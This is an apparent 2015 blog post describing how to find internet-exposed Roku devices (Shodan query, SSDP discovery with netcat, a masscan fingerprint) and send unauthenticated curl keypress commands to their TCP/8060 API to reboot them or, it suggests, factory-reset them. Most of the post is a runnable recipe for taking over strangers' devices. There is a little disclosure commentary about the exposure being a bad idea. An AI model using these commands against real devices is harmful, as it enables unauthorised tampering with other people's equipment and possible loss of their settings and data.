Bouncing Roku

home // code //

07/25/2015
How to Reboot or Factory-reset 1761 Internet-facing Roku Devices with a Few Curl Commands

** UPDATE 3 [7/27/2015] – Some pretty rad research by John Matherly on the shodan blog based on some of these findings.

** UPDATE 2 [7/26/2015]: John Matherly of Shodan.io was kind enough to trigger an internet-wide scan of TCP/8060 to get a better picture of how many devices might be misconfigured to accept API commands from anyone on the internet. Should have some accurate numbers soon, but it’s currently looking like there are ~1900+ devices out there with their API ports hanging out all over the place.

After digging a little bit more… The shodan search actually returned results for UPnP port 1900 and not 8060. 1900 is used by the Roku to advertise itself to other Roku’s on the same network using the SSDP protocol. I don’t believe it’s possible to use that port to issue the API commands i reference to IP’s with UDP/1900 open.

Also, If you want to find the IP addresses of Roku devices on the network you’re on, you’ll have to:

1. create a file with the following in it:

M-SEARCH * HTTP/1.1 Host: 239.255.255.250:1900 Man: "ssdp:discover" ST: roku:ecp [leave a blank line here]

2. Feed that request to netcat while connecting to the multicast address on UDP 1900:

nc -u 239.255.255.250 1900 < ROKU_SSDP_REQUEST.txt

3. Use wireshark to catch any responses. You should see a Location response header with the IP of any Roku’s in the vicinity:

HTTP/1.1 200 OK Cache-Control: max-age=3600 ST: roku:ecp USN: uuid:roku:ecp:[SERIALNUMBER] Ext: Server: Roku UPnP/1.0 MiniUPnPd/1.4 LOCATION: http://192.168.29.181:8060/

It still may be possible to identify Roku’s internet-facing TCP/8060 ports with something like a masscan where the internet IP’s respond with a Server header of “Roku UPnP/1.0 MiniUPnPd/1.4”:

netcat [internet_ip] 8060

HTTP/1.1 400 Bad Request Server: Roku UPnP/1.0 MiniUPnPd/1.4 Content-Length: 0

I Wrote a simple script you can use to bounce a Roku via a bash shell. You can modify this to navigate to other functions like… “factory reset” although that would just be MEAN.

This script basically issues “keypress” commands to the API at TCP/8060 which in turn, navigates through the menus.

Example:
curl -d ” http://$TARGET:8060/keypress/home
curl -d ” http://$TARGET:8060/keypress/down
curl -d ” http://$TARGET:8060/keypress/up
curl -d ” http://$TARGET:8060/keypress/right
etc…

The Roku api keypress options are:

Home
Rev
Fwd
Play
Select
Left
Right
Down
Up
Back
InstantReplay
Info
Backspace
Search
Enter
Lit_*

You can use this as a reference to their API.

Here’s a shodan query with what looks like Roku devices with their API ports facing the internet. *WHY* are they facing the internet? who knows…but that’s a horrible idea.

https://www.shodan.io/search?query=ROKU

There are currently 1761 Roku API ports exposed on the internet.